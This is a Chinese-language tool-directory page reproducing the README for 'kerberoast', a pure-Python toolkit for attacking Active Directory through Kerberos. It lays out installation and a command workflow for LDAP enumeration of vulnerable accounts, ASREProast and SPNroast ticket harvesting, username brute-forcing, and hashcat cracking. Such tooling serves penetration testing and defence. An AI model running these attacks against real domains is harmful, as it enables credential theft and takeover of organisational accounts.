Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
kerberoast — 纯Python编写的Kerberos攻击工具包,支持ASREProast、SPNroast及LDAP枚举,用于识别并利用易受攻击的活动目录账户。 | Kitploit
工具/GitHubGitHub/skelsec/kerberoast
密码攻击漏洞利用信息收集渗透测试身份验证
GitHubskelsec/kerberoast

kerberoast

纯Python编写的Kerberos攻击工具包,支持ASREProast、SPNroast及LDAP枚举,用于识别并利用易受攻击的活动目录账户。

查看仓库
4336532年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Supported Python versions Twitter

🚩 赞助者

如果你喜欢这个项目,请在 GitHub 上赞助它! 赞助者

kerberoast

Kerberos 攻击工具包 —纯 Python— kerbe_card

安装

pip3 install kerberoast

前提条件

Python 3.6 参见 requirements.txt

快速开始

重要:接受的 LDAP 和 Kerberos 目标 URL 格式如下
<ldap_connection_url> : <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>

步骤 —使用 SSPI—: kerberoast auto <DC_ip>

步骤 —不使用 SSPI—:

  1. 通过 LDAP 查找易受攻击的用户
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. 对 ldapenum_asrep_users.txt 文件中的用户执行 ASREP 攻击
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. 对 ldapenum_spn_users.txt 文件中的用户执行 SPN 攻击
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. 使用 hashcat 破解 SPN 攻击和 ASREP 攻击的输出

命令

ldap

此命令组用于通过 LDAP 枚举可能易受攻击的用户。

命令结构

    kerberoast ldap <type> <ldap_connection_url> <options>

Type: 支持枚举三种类型的用户

  1. spn 枚举设置了 servicePrincipalName 属性的用户。
  2. asrep 枚举在 UAC 属性中设置了 DONT_REQ_PREAUTH 标志的用户。
  3. all 启动上述所有枚举。

ldap_connection_url: 以 msldap URL 格式指定用户凭据和目标服务器(参见帮助)

options:
    -o: 输出文件基本名称

brute

此命令通过使用可能的用户名候选对 Kerberos 服务进行暴力破解来执行用户名枚举。

命令结构

    kerberoast brute <realm> <dc_ip> <targets> <options>

realm: Kerberos 领域,通常看起来像 COMPANY.corp
dc_ip: 域控制器的 IP 或主机名
targets: 包含可能用户名候选的文件路径
options:
    -o: 输出文件基本名称

asreproast

此命令用于执行 ASREProast 攻击。

命令结构

    kerberoast asreproast <dc_ip> <options>

dc_ip: 域控制器的 IP 或主机名
options:
    -r: 指定要使用的 Kerberos 领域。它会覆盖所有其他领域信息。
    -o: 输出文件基本名称
    -t: 包含要执行攻击的用户名的文件路径
    -u: 指定要执行攻击的用户。格式为 <username> 或 <username>@<realm>,但在第一种情况下,必须使用 -r 选项指定领域

spnroast

此命令用于执行 SPNroast(又称 kerberoast)攻击。

命令结构

    kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: 以 Kerberos URL 格式指定用户凭据和目标服务器(参见帮助)

options:
    -r: 指定要使用的 Kerberos 领域。它会覆盖所有其他领域信息。
    -o: 输出文件基本名称
    -t: 包含要执行攻击的用户名的文件路径
    -u: 指定要执行攻击的用户。格式为 <username> 或 <username>@<realm>,但在第一种情况下,必须使用 -r 选项指定领域

下载工具